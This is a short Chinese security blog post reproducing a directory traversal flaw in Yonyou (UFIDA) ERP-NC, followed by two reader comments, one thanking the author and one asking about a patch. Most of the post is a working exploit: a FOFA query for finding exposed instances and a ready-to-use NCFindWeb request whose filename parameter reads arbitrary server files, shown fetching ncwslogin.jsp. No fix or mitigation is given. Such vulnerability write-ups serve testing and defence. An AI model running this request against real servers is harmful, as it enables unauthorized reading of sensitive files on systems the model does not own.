Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

用友ERP-NC 目录遍历漏洞

漏洞复现 Adminxe 910℃ 0评论

描述

用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息 fofa:app=”用友-UFIDA-NC”

POC & EXP

http://127.0.0.1/NCFindWeb?service=IPreAlertConfigService&filename=

在filename后面加文件名即可读取文件

http://127.0.0.1/NCFindWeb?service=IPreAlertConfigService&filename=ncwslogin.jsp

转载请注明:Adminxe's Blog » 用友ERP-NC 目录遍历漏洞

喜欢 (10)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(2)个小伙伴在吐槽
  1. 感谢的无私分享!
    xxxxxxxxx2021-06-07 05:01 回复
  2. 请问该漏洞修复的补丁有吗?
    Kris2021-06-13 21:25 (3天前)回复